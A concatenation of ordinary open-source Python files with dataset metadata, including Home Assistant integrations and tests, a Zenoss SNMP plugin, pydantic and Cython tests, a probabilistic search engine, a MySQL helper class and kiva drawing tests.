msg.append('{0:<5}{1:<4}{2}'.format(i+1, Player.records[i][0], Player.records[i][1]))
# Refresh display
display.refresh(msg)
# Parse attack commands
def parse_attack_commands(cmds):
# Parse commands
global devices, deviceID
def split_command(cs):
cmds = []
i = 0
while i < len(cs):
if cs[i] == '<':
new_cs = ''
while i+1 < len(cs) and cs[i+1] != '>':
i += 1
new_cs += cs[i]
cmds.append(new_cs)
i += 1
else:
cmds.append(cs[i])
i +=1
return cmds
# Convert command list into payload list
# and append them into Player.payloads
device = devices[deviceID]
payloads = []
# from utils.devices import amazonbasics, l
|
lukas-hetzenecker/home-assistant
|
tests/components/fritzbox/__init__.py
|
Python
|
apache-2.0
| 3,106
| 0
|
"""Tests for the AVM Fritz!Box integration."""
from __future__ import annotations
from typing import Any
from unittest.mock import Mock
from homeassistant.components.fritzbox.const import DOMAIN
from homeassistant.core import HomeAssistant
from .const import (
CONF_FAKE_AIN,
CONF_FAKE_MANUFACTURER,
CONF_FAKE_NAME,
CONF_FAKE_PRODUCTNAME,
)
from tests.common import MockConfigEntry
async def setup_config_entry(
hass: HomeAssistant,
data: dict[str, Any],
unique_id: str = "any",
device: Mock = None,
fritz: Mock = None,
) -> bool:
"""Do setup of a MockConfigEntry."""
entry = MockConfigEntry(
domain=DOMAIN,
data=data,
unique_id=unique_id,
)
entry.add_to_hass(hass)
if device is not None and fritz is not None:
fritz().get_devices.return_value = [device]
result = await hass.config_entries.async_setup(entry.entry_id)
if device is not None:
await hass.async_block_till_done()
return result
class FritzDeviceBaseMock(Mock):
"""base mock of a AVM Fritz!Box binary sensor device."""
ain = CONF_FAKE_AIN
manufacturer = CONF_FAKE_MANUFACTURER
name = CONF_FAKE_NAME
productname = CONF_FAKE_PRODUCTNAME
class FritzDeviceBinarySensorMock(FritzDeviceBaseMock):
"""Mock of a AVM Fritz!Box binary sensor device."""
alert_state = "fake_state"
battery_level = 23
fw_version = "1.2.3"
has_alarm = T
|
rue
has_powermeter = False
has_switch = False
has_temperature_sensor = False
has_thermostat = False
present = True
class FritzDeviceClimateMock(Fritz
|
DeviceBaseMock):
"""Mock of a AVM Fritz!Box climate device."""
actual_temperature = 18.0
alert_state = "fake_state"
battery_level = 23
battery_low = True
comfort_temperature = 22.0
device_lock = "fake_locked_device"
eco_temperature = 16.0
fw_version = "1.2.3"
has_alarm = False
has_powermeter = False
has_switch = False
has_temperature_sensor = False
has_thermostat = True
holiday_active = "fake_holiday"
lock = "fake_locked"
present = True
summer_active = "fake_summer"
target_temperature = 19.5
window_open = "fake_window"
class FritzDeviceSensorMock(FritzDeviceBaseMock):
"""Mock of a AVM Fritz!Box sensor device."""
battery_level = 23
device_lock = "fake_locked_device"
fw_version = "1.2.3"
has_alarm = False
has_powermeter = False
has_switch = False
has_temperature_sensor = True
has_thermostat = False
lock = "fake_locked"
present = True
temperature = 1.23
rel_humidity = 42
class FritzDeviceSwitchMock(FritzDeviceBaseMock):
"""Mock of a AVM Fritz!Box switch device."""
battery_level = None
device_lock = "fake_locked_device"
energy = 1234
voltage = 230
fw_version = "1.2.3"
has_alarm = False
has_powermeter = True
has_switch = True
has_temperature_sensor = True
has_thermostat = False
switch_state = "fake_state"
lock = "fake_locked"
power = 5678
present = True
temperature = 1.23
|
zenoss/ZenPacks.community.VMwareESXMonitor
|
ZenPacks/community/VMwareESXMonitor/modeler/plugins/zenoss/snmp/Esx.py
|
Python
|
gpl-2.0
| 1,873
| 0.003203
|
###########################################################################
#
# This program is part of Zenoss Core, an open source monitoring platform.
# Copyright (C) 2009, Zenoss Inc.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 as published by
# the Free Software Foundation.
#
# For complete information please visit: http://www.zenoss.com/oss/
#
###########################################################################
__doc__="""Esx
Plugin to gather information about virtual machines running
under a VMWare ESX server v3.0
"""
import Globals
from Products.DataCollector.plugins.CollectorPlugin \
import SnmpPlugin, GetTableMap
from Products.DataCollector.plugins.DataMaps \
import ObjectMap
class Esx(SnmpPlugin):
# compname = "os"
relname = "guestDevices"
modname = 'ZenPacks.zenoss.ZenossVi
|
rtualHostMonitor.VirtualMachine'
columns = {
'.1': 'snmpindex',
'.2': 'displayName',
'.4': 'osType',
'.5': 'memory',
'.6': 'adminStatus',
'.7': 'vmid',
'.8': 'operStatus',
}
snmpGetTableMaps = (
GetTableMap('vminfo', '.1.3.6.1.4.1.6876
|
.2.1.1', columns),
)
def process(self, device, results, log):
log.info('processing %s for device %s', self.name(), device.id)
getdata, tabledata = results
table = tabledata.get("vminfo")
rm = self.relMap()
for info in table.values():
info['adminStatus'] = info['adminStatus'] == 'poweredOn'
info['operStatus'] = info['operStatus'] == 'running'
info['snmpindex'] = info['vmid']
del info['vmid']
om = self.objectMap(info)
om.id = self.prepId(om.displayName)
rm.append(om)
return [rm]
|
leppa/home-assistant
|
homeassistant/components/vlc_telnet/media_player.py
|
Python
|
apache-2.0
| 7,570
| 0.000132
|
"""Provide functionality to interact with the vlc telnet interface."""
import logging
from python_telnet_vlc import ConnectionError as ConnErr, VLCTelnet
import voluptuous as vol
from homeassistant.components.media_player import PLATFORM_SCHEMA, MediaPlayerDevice
from homeassistant.components.media_player.const import (
MEDIA_TYPE_MUSIC,
SUPPORT_CLEAR_PLAYLIST,
SUPPORT_NEXT_TRACK,
SUPPORT_PAUSE,
SUPPORT_PLAY,
SUPPORT_PLAY_MEDIA,
SUPPORT_PREVIOUS_TRACK,
SUPPORT_SEEK,
SUPPORT_SHUFFLE_SET,
SUPPORT_STOP,
SUPPORT_VOLUME_MUTE,
SUPPORT_VOLUME_SET,
)
from homeassistant.const import (
CONF_HOST,
CONF_NAME,
CONF_PASSWORD,
CONF_PORT,
STATE_IDLE,
STATE_PAUSED,
STATE_PLAYING,
STATE_UNAVAILABLE,
)
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
DOMAIN = "vlc_telnet"
DEFAULT_NAME = "VLC-TELNET"
DEFAULT_PORT = 4212
SUPPORT_VLC = (
SUPPORT_PAUSE
| SUPPORT_SEEK
| SUPPORT_VOLUME_SET
| SUPPORT_VOLUME_MUTE
| SUPPORT_PREVIOUS_TRACK
| SUPPORT_NEXT_TRACK
| SUPPORT_PLAY_MEDIA
| SUPPORT_STOP
| SUPPORT_CLEAR_PLAYLIST
| SUPPORT_PLAY
| SUPPORT_SHUFFLE_SET
)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.positive_int,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the vlc platform."""
add_entities(
[
VlcDevice(
config.get(CONF_NAME),
config.get(CONF_HOST),
config.get(CONF_PORT),
config.get(CONF_PASSWORD),
)
],
True,
)
class VlcDevice(MediaPlayerDevice):
"""Representation of a vlc player."""
def __init__(self, name, host, port, passwd):
"""Initialize the vlc device."""
self._instance = None
self._name = name
self._volume = None
self._muted = None
self._state = STATE_UNAVAILABLE
self._media_position_updated_at = None
self._media_position = None
self._media_duration = None
self._host = host
self._port = port
self._password = passwd
self._vlc = None
self._available = False
self._volume_bkp = 0
self._media_artist = ""
self._media_title = ""
def update(self):
"""Get the latest details from the device."""
if self._vlc is None:
try:
self._vlc = VLCTelnet(self._host, self._password, self._port)
self._state = STATE_IDLE
self._available = True
except (ConnErr, EOFError):
self._available = False
self._vlc = None
else:
try:
status = self._vlc.status()
if status:
if "volume" in status:
self._volume = int(status["vo
|
lume"]) / 500.0
else:
self._volume = None
if "state" in status:
state = status["state"]
if state == "playing":
self._state = STATE_PLAYING
elif state == "paused":
self._state = STATE_PAUSED
else:
self._state = STATE_IDLE
|
else:
self._state = STATE_IDLE
self._media_duration = self._vlc.get_length()
self._media_position = self._vlc.get_time()
info = self._vlc.info()
if info:
self._media_artist = info[0].get("artist")
self._media_title = info[0].get("title")
except (ConnErr, EOFError):
self._available = False
self._vlc = None
return True
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def state(self):
"""Return the state of the device."""
return self._state
@property
def available(self) -> bool:
"""Return True if entity is available."""
return self._available
@property
def volume_level(self):
"""Volume level of the media player (0..1)."""
return self._volume
@property
def is_volume_muted(self):
"""Boolean if volume is currently muted."""
return self._muted
@property
def supported_features(self):
"""Flag media player features that are supported."""
return SUPPORT_VLC
@property
def media_content_type(self):
"""Content type of current playing media."""
return MEDIA_TYPE_MUSIC
@property
def media_duration(self):
"""Duration of current playing media in seconds."""
return self._media_duration
@property
def media_position(self):
"""Position of current playing media in seconds."""
return self._media_position
@property
def media_position_updated_at(self):
"""When was the position of the current playing media valid."""
return self._media_position_updated_at
@property
def media_title(self):
"""Title of current playing media."""
return self._media_title
@property
def media_artist(self):
"""Artist of current playing media, music track only."""
return self._media_artist
def media_seek(self, position):
"""Seek the media to a specific location."""
track_length = self._vlc.get_length() / 1000
self._vlc.seek(position / track_length)
def mute_volume(self, mute):
"""Mute the volume."""
if mute:
self._volume_bkp = self._volume
self._volume = 0
self._vlc.set_volume("0")
else:
self._vlc.set_volume(str(self._volume_bkp))
self._volume = self._volume_bkp
self._muted = mute
def set_volume_level(self, volume):
"""Set volume level, range 0..1."""
self._vlc.set_volume(str(volume * 500))
self._volume = volume
def media_play(self):
"""Send play command."""
self._vlc.play()
self._state = STATE_PLAYING
def media_pause(self):
"""Send pause command."""
self._vlc.pause()
self._state = STATE_PAUSED
def media_stop(self):
"""Send stop command."""
self._vlc.stop()
self._state = STATE_IDLE
def play_media(self, media_type, media_id, **kwargs):
"""Play media from a URL or file."""
if media_type != MEDIA_TYPE_MUSIC:
_LOGGER.error(
"Invalid media type %s. Only %s is supported",
media_type,
MEDIA_TYPE_MUSIC,
)
return
self._vlc.add(media_id)
self._state = STATE_PLAYING
def media_previous_track(self):
"""Send previous track command."""
self._vlc.prev()
def media_next_track(self):
"""Send next track command."""
self._vlc.next()
def clear_playlist(self):
"""Clear players playlist."""
self._vlc.clear()
def set_shuffle(self, shuffle):
"""Enable/disable shuffle mode."""
self._vlc.random(shuffle)
|
samuelcolvin/pydantic
|
tests/test_create_model.py
|
Python
|
mit
| 6,429
| 0.001555
|
import pytest
from pydantic import BaseModel, Extra, Field, ValidationError, create_model, errors, validator
def test_create_model():
model = create_model('FooModel', foo=(str, ...), bar=123)
assert issubclass(model, BaseModel)
assert issubclass(model.__config__, BaseModel.Config)
assert model.__name__ == 'FooModel'
assert model.__fields__.keys() == {'foo', 'bar'}
assert model.__validators__ == {}
assert model.__config__.__name__ == 'Config'
assert model.__module__ == 'pydantic.main'
def test_create_model_usage():
model = create_model('FooModel', foo=(str, ...), bar=123)
m = model(foo='hello')
assert m.foo == 'hello'
assert m.bar == 123
with pytest.raises(ValidationError):
model()
with pytest.raises(ValidationError):
model(foo='hello', bar='xxx')
def test_create_model_pickle(create_module):
"""
Pickle will work for dynamically created model only if it was defined globally with its class name
and module where it's defined was specified
"""
@create_module
def module():
import pickle
from pydantic import create_model
FooModel = create_model('FooModel', foo=(str, ...), bar=123, __module__=__name__)
m = FooModel(foo='hello')
d = pickle.dumps(m)
m2 = pickle.loads(d)
assert m2.foo == m.foo == 'hello'
assert m2.bar == m.bar == 123
assert m2 == m
assert m2 is not m
def test_invalid_name():
with pytest.warns(RuntimeWarning):
model = create_model('FooModel', _foo=(str, ...))
assert len(model.__fields__) == 0
def test_field_wrong_tuple():
with pytest.raises(errors.ConfigError):
create_model('FooModel', foo=(1, 2, 3))
def test_config_and_base():
with pytest.raises(errors.ConfigError):
create_model('FooModel', __config__=BaseModel.Config, __base__=BaseModel)
def test_inheritance():
class BarModel(BaseModel):
x = 1
y = 2
model = create_model('
|
FooModel', foo=(str, ...), bar=(int, 123), __base__=BarModel)
assert model.__fields__.keys() == {'foo', 'bar', 'x', 'y'}
m = model(foo='a', x=4)
assert m.dict
|
() == {'bar': 123, 'foo': 'a', 'x': 4, 'y': 2}
def test_custom_config():
class Config:
fields = {'foo': 'api-foo-field'}
model = create_model('FooModel', foo=(int, ...), __config__=Config)
assert model(**{'api-foo-field': '987'}).foo == 987
assert issubclass(model.__config__, BaseModel.Config)
with pytest.raises(ValidationError):
model(foo=654)
def test_custom_config_inherits():
class Config(BaseModel.Config):
fields = {'foo': 'api-foo-field'}
model = create_model('FooModel', foo=(int, ...), __config__=Config)
assert model(**{'api-foo-field': '987'}).foo == 987
assert issubclass(model.__config__, BaseModel.Config)
with pytest.raises(ValidationError):
model(foo=654)
def test_custom_config_extras():
class Config(BaseModel.Config):
extra = Extra.forbid
model = create_model('FooModel', foo=(int, ...), __config__=Config)
assert model(foo=654)
with pytest.raises(ValidationError):
model(bar=654)
def test_inheritance_validators():
class BarModel(BaseModel):
@validator('a', check_fields=False)
def check_a(cls, v):
if 'foobar' not in v:
raise ValueError('"foobar" not found in a')
return v
model = create_model('FooModel', a='cake', __base__=BarModel)
assert model().a == 'cake'
assert model(a='this is foobar good').a == 'this is foobar good'
with pytest.raises(ValidationError):
model(a='something else')
def test_inheritance_validators_always():
class BarModel(BaseModel):
@validator('a', check_fields=False, always=True)
def check_a(cls, v):
if 'foobar' not in v:
raise ValueError('"foobar" not found in a')
return v
model = create_model('FooModel', a='cake', __base__=BarModel)
with pytest.raises(ValidationError):
model()
assert model(a='this is foobar good').a == 'this is foobar good'
with pytest.raises(ValidationError):
model(a='something else')
def test_inheritance_validators_all():
class BarModel(BaseModel):
@validator('*')
def check_all(cls, v):
return v * 2
model = create_model('FooModel', a=(int, ...), b=(int, ...), __base__=BarModel)
assert model(a=2, b=6).dict() == {'a': 4, 'b': 12}
def test_funky_name():
model = create_model('FooModel', **{'this-is-funky': (int, ...)})
m = model(**{'this-is-funky': '123'})
assert m.dict() == {'this-is-funky': 123}
with pytest.raises(ValidationError) as exc_info:
model()
assert exc_info.value.errors() == [
{'loc': ('this-is-funky',), 'msg': 'field required', 'type': 'value_error.missing'}
]
def test_repeat_base_usage():
class Model(BaseModel):
a: str
assert Model.__fields__.keys() == {'a'}
model = create_model('FooModel', b=1, __base__=Model)
assert Model.__fields__.keys() == {'a'}
assert model.__fields__.keys() == {'a', 'b'}
model2 = create_model('Foo2Model', c=1, __base__=Model)
assert Model.__fields__.keys() == {'a'}
assert model.__fields__.keys() == {'a', 'b'}
assert model2.__fields__.keys() == {'a', 'c'}
model3 = create_model('Foo2Model', d=1, __base__=model)
assert Model.__fields__.keys() == {'a'}
assert model.__fields__.keys() == {'a', 'b'}
assert model2.__fields__.keys() == {'a', 'c'}
assert model3.__fields__.keys() == {'a', 'b', 'd'}
def test_dynamic_and_static():
class A(BaseModel):
x: int
y: float
z: str
DynamicA = create_model('A', x=(int, ...), y=(float, ...), z=(str, ...))
for field_name in ('x', 'y', 'z'):
assert A.__fields__[field_name].default == DynamicA.__fields__[field_name].default
def test_config_field_info_create_model():
class Config:
fields = {'a': {'description': 'descr'}}
m1 = create_model('M1', __config__=Config, a=(str, ...))
assert m1.schema()['properties'] == {'a': {'title': 'A', 'description': 'descr', 'type': 'string'}}
m2 = create_model('M2', __config__=Config, a=(str, Field(...)))
assert m2.schema()['properties'] == {'a': {'title': 'A', 'description': 'descr', 'type': 'string'}}
|
bzzzz/cython
|
tests/run/pure_py.py
|
Python
|
apache-2.0
| 4,851
| 0.013193
|
import cython
def test_sizeof():
"""
>>> test_sizeof()
True
True
True
True
True
"""
x = cython.declare(cython.bint)
print(cython.sizeof(x) == cython.sizeof(cython.bint))
print(cython.sizeof(cython.char) <= cython.sizeof(cython.short) <= cython.sizeof(cython.int) <= cython.sizeof(cython.long) <= cython.sizeof(cython.longlong))
print(cython.sizeof(cython.uint) == cython.sizeof(cython.int))
print(cython.sizeof(cython.p_int) == cython.sizeof(cython.p_double))
if cython.compiled:
print(cython.sizeof(cython.char) < cython.sizeof(cython.longlong))
else:
print(cython.sizeof(cython.char) == 1)
## CURRENTLY BROKEN - FIXME!!
## def test_declare(n):
## """
## >>> test_declare(100)
## (100, 100)
## >>> test_declare(100.5)
## (100, 100)
## >>> test_declare(None)
## Traceback (most recent call last):
## ...
## TypeError: an integer is required
## """
## x = cython.declare(cython.int)
## y = cython.declare(cython.int, n)
## if cython.compiled:
## cython.declare(xx=cython.int, yy=cython.long)
## i = sizeof(xx)
## ptr = cython.declare(cython.p_int, cython.address(y))
## return y, ptr[0]
@cython.locals(x=cython.double, n=cython.int)
def test_cast(x):
"""
>>> test_cast(1.5)
1
"""
n = cython.cast(cython.int, x)
return n
@cython.locals(x=cython.int, y=cython.p_int)
def test_address(x):
"""
>>> test_address(39)
39
"""
y = cython.address(x)
return y[0]
## CURRENTLY BROKEN - FIXME!!
## @cython.locals(x=cython.int)
## @cython.locals(y=cython.bint)
## def test_locals(x):
## """
## >>> test_locals(5)
## True
## """
## y = x
## return y
def test_with_nogil(nogil):
"""
>>> raised = []
>>> class nogil(object):
... def __enter__(self):
... pass
... def __exit__(self, exc_class, exc, tb):
... raised.append(exc)
... return exc_class is None
>>> test_with_nogil(nogil())
WORKS
True
>>> raised
[None]
"""
result = False
with nogil:
print("WORKS")
with cython.nogil:
result = True
return result
## CURRENTLY BROKEN - FIXME!!
## MyUnion = cython.union(n=cython.int, x=cython.double)
## MyStruct = cython.struct(is_integral=cython.bint, data=MyUnion)
## MyStruct2 = cython.typedef(MyStruct[2])
## def test_struct(n, x):
## """
## >>> test_struct(389, 1.64493)
## (389, 1.64493)
## """
## a = cython.declare(MyStruct2)
## a[0] = MyStruct(True, data=MyUnion(n=n))
## a[1] = MyStruct(is_integral=False, data={'x': x})
## return a[0].data.n, a[1].data.x
import cython as cy
from cython import declare, cast, locals, address, typedef, p_void, compiled
from cython import declare as my_declare, locals as my_locals, p_void as my_void_star, typedef as my_typedef, compiled as my_compiled
@my_locals(a=cython.p_void)
def test_imports():
"""
>>> test_imports() # (True, True)
True
"""
a = cython.NULL
b = declare
|
(p_void, cython.NULL)
c = my_declare(my_void_star, cython.NULL)
d = cy.declare(cy.p_void, cython.NULL)
## CURRENTLY BROKEN - FIXME!!
#return a == d, compiled == my_compiled
return compiled == my_compiled
## CURRENTLY BROKEN
|
- FIXME!!
## MyStruct3 = typedef(MyStruct[3])
## MyStruct4 = my_typedef(MyStruct[4])
## MyStruct5 = cy.typedef(MyStruct[5])
def test_declare_c_types(n):
"""
>>> test_declare_c_types(0)
>>> test_declare_c_types(1)
>>> test_declare_c_types(2)
"""
#
b00 = cython.declare(cython.bint, 0)
b01 = cython.declare(cython.bint, 1)
b02 = cython.declare(cython.bint, 2)
#
i00 = cython.declare(cython.uchar, n)
i01 = cython.declare(cython.char, n)
i02 = cython.declare(cython.schar, n)
i03 = cython.declare(cython.ushort, n)
i04 = cython.declare(cython.short, n)
i05 = cython.declare(cython.sshort, n)
i06 = cython.declare(cython.uint, n)
i07 = cython.declare(cython.int, n)
i08 = cython.declare(cython.sint, n)
i09 = cython.declare(cython.slong, n)
i10 = cython.declare(cython.long, n)
i11 = cython.declare(cython.ulong, n)
i12 = cython.declare(cython.slonglong, n)
i13 = cython.declare(cython.longlong, n)
i14 = cython.declare(cython.ulonglong, n)
i20 = cython.declare(cython.Py_ssize_t, n)
i21 = cython.declare(cython.size_t, n)
#
f00 = cython.declare(cython.float, n)
f01 = cython.declare(cython.double, n)
f02 = cython.declare(cython.longdouble, n)
#
#z00 = cython.declare(cython.complex, n+1j)
#z01 = cython.declare(cython.floatcomplex, n+1j)
#z02 = cython.declare(cython.doublecomplex, n+1j)
#z03 = cython.declare(cython.longdoublecomplex, n+1j)
|
brunitto/python-runner
|
lib/stages/cairo_museum.py
|
Python
|
mit
| 1,374
| 0
|
"""cairo_museum.py"""
from lib.stage import Stage
class CairoMuseum(Stage):
"""Cairo Museum stage"""
def desc(self):
"""Describe action"""
action = """
After getting the first replicant, you call some old friends and some of them
mentions something about a hippie woman that likes no jokes. You get the next
ship to Cairo and go to a big museum. Everything smells dust and there are a
lot of camels and people around. In an isolated corner, you see a different
woman in bad mood, looking to you from time to time...
"""
self.console.simulate_typing(action)
d
|
ef look(self):
"""Look action"""
action = """
Everyone seens to be busy looking at the art, mainly the big statues, nothing
suspicious, except for a different woman in the corner...
"""
self.console.simulate_typing(action)
def talk(self):
"""Talk action"""
action = """
You say 'hi' to the woman...
"""
self.console.simulate_ty
|
ping(action)
def joke(self):
"""Joke action"""
action = """
You tell a really good joke and an old mummy start laughing...
"""
self.console.simulate_typing(action)
def fight(self):
"""Fight action"""
action = """
You try to start a fight, but a camel holds you and tells you to calm down...
"""
self.console.simulate_typing(action)
|
Jverma/InfoR
|
InfoR/ProbabilitisticModels.py
|
Python
|
mit
| 5,245
| 0.045567
|
# -*- coding: utf-8 -*-
# A search engine based on probabilitistic models of the information retrival.
# Author - Janu Verma
# email - jv367@cornell.edu
# http://januverma.wordpress.com/
# @januverma
import sys
from pydoc import help
import os
from collections import defaultdict
from math import log, sqrt
import operator
class ProbModel:
"""
Implements probabilitistic models for information retrieval.
"""
def __init__(self, directory):
"""
Arguments:
directory - Directory of documents to be searched.
"""
self.corpus = os.listdir(directory)
self.text = {}
for f in self.corpus:
f = os.path.join(directory,f)
with open(f) as doc:
info = doc.read()
self.text[f] = info
def words(self, document):
"""
All the words in a document.
Arguments:
document : A textual document.
Returns:
A list containing all the words in the document.
"""
words = document.split()
words = [x.lower() for x in words]
words = [x for x in words if len(x) >= 2and not x.isdigit()]
return words
def word_freq(self, wordlist):
"""
Build a dictionary of words with the frequencies of their occurance in the document.
Arguments:
document : A list of all the words in a document.
Returns:
A dictionary containing all the words in the document with their frequencies.
"""
wordFreq = defaultdict(int)
for w in wordlist:
wordFreq[w] += 1
return wordFreq
def vocabalury(self):
"""
All the words in the corpus.
Returns:
A list of all the words in the corpus.
"""
allWords = []
allDocs = self.text
for d in allDocs.keys():
d = allDocs[d]
docWords = self.words(d)
allWords.extend(docWords)
return allWords
def doc_freq(self):
"""
Compute the document frequency of all the terms in the corpus.
Returns:
A dictionary of all the terms in the corpus with their document frequency.
"""
allWords = self.vocabalury()
allWords = set(allWords)
allDocs = self.text
docFreq = defaultdict(int)
for x in allWords:
for d in allDocs.keys():
d = allDocs[d]
docTerms = self.words(d)
if (x in docTerms):
docFreq[x] += 1
return docFreq
def docScore(self, document, query, k, b):
"""
Compute the log odds ratio of the document being relevant to the query.
Arguments:
document : A textual document.
query : The search query.
k : tuning parameter for term frequency.
b : tuning parameter for for document length.
Returns:
A floating variable score
"""
# total number of docs
n = len(self.corpus)
# words in the document
docText = self.words(document)
# length of the document
l = len(docText)
# average length of a document
l_av = float(len(self.vocabalury()))/n
# document frequency dict
df = self.doc_freq()
# words in the document
tokens = self.words(document)
#term frequency dict
tf = self.word_freq(tokens)
# inittalize the score for the document
score = 0
# query
queryWords = self.words(query)
for
|
x in queryWords:
try:
tf_x = tf[x]
e
|
xcept:
continue
try:
df_x = df[x]
except:
continue
# inverse document frequency of the term.
idf = log(n/df_x)
# correction factor
correction = float((k + 1)*(tf_x))/(k*(1-b) + b*(l/(l_av)) + (tf_x))
# total contribution
contribution = idf * correction
score += contribution
return score
def ranking(self, query, k, b):
"""
Ranking of the documents based on their relevance to the query.
Arguments:
query: The search query
Returns:
A dictionary of all the documents in the corpus with their corresponding relevance odds ratio.
"""
if (k != None):
k = k
else:
k = 0
if (b != None):
b = b
else:
b = 0
documents = self.text
rankingDict = defaultdict(float)
for d in documents.keys():
docText = documents[d]
score = self.docScore(docText, query, k, b)
rankingDict[d] = score
return rankingDict
def search(self, query, n_docs, k=None, b=None):
"""
Returns documents which are most relavant to the query.
Ranking is done by decreasing odds ratio for the document to be relevant for the query.
Arguments:
String query : Search query
Integer n_docs : Number of matching documents retrived.
Float k : tuning parameter for term frequency, (0<=k<=1).
A value of 0 corresponds to a binary model (no term frequency),
and a large value corresponds to using raw term frequency
Float b: tuning parameter for for document length, (0<=b<=1).
b = 1 corresponds to fully scaling the term weight by the document length,
while b = 0 corresponds to no length normalization.
Returns:
A list of length n_docs containing documents most relevant to the search query.
The list if sorted in the descending order.
"""
if (n_docs > len(self.corpus)):
n_docs = len(self.corpus)
relevantDocs = []
if (k != None):
k = k
if (b != None):
b = b
rankings = self.ranking(query, k, b)
rankings = sorted(rankings.iteritems(), key=operator.itemgetter(1), reverse=True)
for i in range(n_docs):
u,v = rankings[i]
relevantDocs.append(u)
return relevantDocs
|
WZQ1397/automatic-repo
|
python/FileSystem/BTpanel/btclass/panelMysql.py
|
Python
|
lgpl-3.0
| 3,122
| 0.02675
|
#coding: utf-8
# +-------------------------------------------------------------------
# | 宝塔Linux面板
# +-------------------------------------------------------------------
# | Copyright (c) 2015-2016 宝塔软件(http://bt.cn) All rights reserved.
# +-------------------------------------------------------------------
# | Author: 黄文良 <2879625666@qq.com>
# +-------------------------------------------------------------------
import re,os
class panelMysql:
__DB_PASS = None
__DB_USER = 'root'
__DB_PORT = 3306
__DB_HOST = '127.0.0.1'
__DB_CONN = None
__DB_CUR = None
__DB_ERR = None
__DB_HOST_CONF = 'data/mysqlHost.pl';
#连接MYSQL数据库
def __Conn(self):
try:
import public
try:
import MySQLdb
except Exception,ex:
self.__DB_ERR = ex
return False;
try:
myconf = public.readFile('/etc/my.cnf');
rep = "port\s*=\s*([0-9]+)"
self.__DB_PORT = int(re.search(rep,myconf).groups()[0]);
except:
self.__DB_PORT = 3306;
self.__DB_PASS = public.M('config').where('id=?',(1,)).getField('mysql_root');
try:
if os.path.exists(self.__DB_HOST_CONF): self.__DB_HOST = public.readFile(self.__DB_HOST_CONF);
self.__DB_CONN = MySQLdb.connect(host = self.__DB_HOST,user = self.__DB_USER,passwd = self.__DB_PASS,port = self.__DB_PORT,charset="utf8",connect_timeout=1)
except MySQLdb.Error,e:
if e[0] != 2003:
self.__DB_ERR = e
return False
if self.__DB_HOST == 'localhost':
self.__DB_HOST = '127.0.0.1';
else:
self.__DB_HOST = 'localhost';
public.writeFile(self.__DB_HOST_CONF,self.__DB_HOST);
self.__DB_CONN = MySQLdb.connect(host = self.__DB_HOST,user = self.__DB_USER,passwd = self.__DB
|
_PASS,port = self.__DB_PORT,charset="utf8",connect_timeout=1)
self.__DB_CUR = self.__DB_CONN.cursor()
return True
except MySQLdb.Error,e:
self.__DB_ERR = e
return False
def execute(self,sql):
#执行SQL语句返回受影响行
if not self.__Conn(): return self.__DB_ERR
try:
result = self.__DB_CUR.execute(sql)
self.__DB_CONN.commit()
|
self.__Close()
return result
except Exception,ex:
return ex
def query(self,sql):
#执行SQL语句返回数据集
if not self.__Conn(): return self.__DB_ERR
try:
self.__DB_CUR.execute(sql)
result = self.__DB_CUR.fetchall()
#将元组转换成列表
data = map(list,result)
self.__Close()
return data
except Exception,ex:
return ex
#关闭连接
def __Close(self):
self.__DB_CUR.close()
self.__DB_CONN.close()
|
pegurnee/2015-01-341
|
projects/project1_mini_python/python_mini_project.py
|
Python
|
mit
| 412
| 0.002427
|
def at_len(the_list):
"""
|
Takes a list and returns the number
of atomic elements (basic unit of data)
of the list
:param the_list: a list of elements
:return: the number of atomic elements in the list
"""
count = 0
for each_elem in the_list:
if isinstance(each_elem, list)
|
:
count += at_len(each_elem)
else:
count += 1
return count
|
richard-shepherd/monopyly
|
monopyly/game/dice.py
|
Python
|
mit
| 436
| 0
|
import random
class Dice(object):
'''
Generates random numbers by rolling two 'dice'.
The reason for this class existing is so that it ca
|
n be
mocked and replaced with a deterministic version for
testing.
'''
def roll(self):
'''
Returns two value: the rolls of the two dice.
'''
roll1 = random.ra
|
ndint(1, 6)
roll2 = random.randint(1, 6)
return roll1, roll2
|
iambernie/hdf5handler
|
examples/opening.py
|
Python
|
mit
| 183
| 0.005464
|
#!/usr/bin/env python
from hdf5handler import HDF5Handler
handler = HDF5Handler('mydata.hdf5')
handler.open()
for i in range(100):
handler
|
.put(i, 'numbers')
handler.close()
| |
nylas/sync-engine
|
migrations/versions/120_simplify_transaction_log.py
|
Python
|
agpl-3.0
| 688
| 0.002907
|
"""simpli
|
fy transaction log
Revision ID: 8c2406df6f8
Revises:58732bb5d14b
Create Date: 2014-08-08 01:57:17.144405
"""
# revision identifiers, used by Alembic.
revision = '8c2406df6f8'
down_revision = '58732bb5d14b'
from alembic import op
from sqlalchemy.sql import text
def upgrade():
conn = op.get_bind()
conn.execute(text('''
ALTER TABLE transa
|
ction
CHANGE public_snapshot snapshot LONGTEXT,
CHANGE table_name object_type VARCHAR(20),
DROP COLUMN private_snapshot,
DROP COLUMN delta,
ADD INDEX `ix_transaction_object_public_id` (`object_public_id`)
'''))
def downgrade():
raise Exception()
|
tommy-u/enable
|
kiva/tests/drawing_tester.py
|
Python
|
bsd-3-clause
| 5,452
| 0.000183
|
import contextlib
import os
import shutil
import tempfile
import numpy
from PIL import Image
from kiva.fonttools import Font
from kiva.constants import MODERN
class DrawingTester(object):
""" Basic drawing tests for graphics contexts.
"""
def setUp(self):
self.directory = tempfile.mkdtemp()
self.filename = os.path.join(self.directory, 'rendered')
self.gc = self.create_graphics_context(300, 300)
self.gc.clear()
self.gc.set_stroke_color((1.0, 0.0, 0.0))
self.gc.set_fill_color((1.0, 0.0, 0.0))
self.gc.set_line_width(5)
def tearDown(self):
del self.gc
shutil.rmtree(self.directory)
def test_line(self):
with self.draw_and_check():
self.gc
|
.begin_path()
self.gc.move_to(107, 204)
self.gc.line_to(107, 104)
self.gc.stroke_path()
def test_rectangle(self):
with self.draw_and_check():
self.gc.begin_path()
self.gc.move_to(107, 104)
self.gc.line_to(107,
|
184)
self.gc.line_to(187, 184)
self.gc.line_to(187, 104)
self.gc.line_to(107, 104)
self.gc.stroke_path()
def test_rect(self):
